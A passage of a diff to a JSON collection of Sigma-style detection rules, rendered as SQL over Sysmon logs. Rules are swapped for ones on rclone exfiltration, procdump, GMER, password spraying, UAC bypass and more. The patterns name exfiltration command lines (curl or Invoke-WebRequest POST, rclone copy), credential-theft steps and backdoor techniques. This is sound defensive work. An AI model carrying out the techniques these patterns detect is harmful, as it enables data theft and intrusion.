'zennmap.exe')))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - GMER Rootkit Detector and Remover Execution", + "id": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", + "status": "experimental", + "description": "Detects the execution GMER tool based on image and hash fields.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ "Unlikely" ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" - }, - { - "title": "Suspicious Rundll32 Activity", - "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gmer.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=E9DC058440D321AA17D0600B3CA0AB04%' ESCAPE '\\' OR Hashes LIKE '%SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173%' ESCAPE '\\') OR md5 = 'e9dc058440d321aa17d0600b3ca0ab04' OR sha1 = '539c228b6b332f5aa523e5ce358c16647d8bbe57' OR sha256 = 'e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173'))" ], - "filename": "proc_creation_win_rundll32_susp_activity.yml" + "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Suspicious Registration via cscript.exe", - "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "title": "Gpg4Win Decrypt Files From Suspicious Locations", + "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", "status": "experimental", - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "author": "Austin Songer @austinsonger", + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" + "filename": "proc_creation_win_gpg4win_susp_usage.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", - "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", + "title": "Procdump Execution", + "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "status": "experimental", + "description": "Detects usage of the SysInternals Procdump utility", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" - }, - { - "title": "Domain Trust Discovery Via Dsquery", - "id": "3bad990e-4848-4a78-9530-b427d854aac0", - "status": "test", - "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", - "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", - "tags": [ - "attack.discovery", - "attack.t1482" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" + "Legitimate use of procdump by a developer or administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" + "filename": "proc_creation_win_sysinternals_procdump.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "PsExec Service Execution", - "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "title": "Potential Recon Activity Using Wevtutil", + "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", "status": "experimental", - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.discovery" ], "falsepositives": [ - "Legitimate administrative tasks" + "Legitimate usage of the utility by administrators to query the event log" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psexesvc.yml" + "filename": "proc_creation_win_wevtutil_recon.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "status": "experimental", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.lateral_movement" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "Remote Access Tool - LogMeIn Execution", - "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", - "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "title": "Potential Password Spraying Attempt Using Dsacls.EXE", + "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "status": "experimental", + "description": "Detects possible password spraying attempts using Dsacls", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of dsacls to bind to an LDAP session" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_logmein.yml" + "filename": "proc_creation_win_dsacls_password_spray.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WmiPrvSE Spawned A Process", + "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "status": "stable", + "description": "Detects WmiPrvSE spawning a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "False positives are expected (e.g. in environments where WinRM is used legitimately)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((LogonId IN ('0x3e7', 'null')) OR ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (LogonId = '')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_wmiprvse_spawning_process.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "PUA - Advanced Port Scanner Execution", + "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "status": "experimental", + "description": "Detects the use of Advanced Port Scanner.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.discovery", + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Unlikely" + "Legitimate administrative use", + "Tools with similar commandline (very rare)" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentImage LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND Image LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Test.exe' ESCAPE '\\' AND Image LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentImage LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND Image LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": 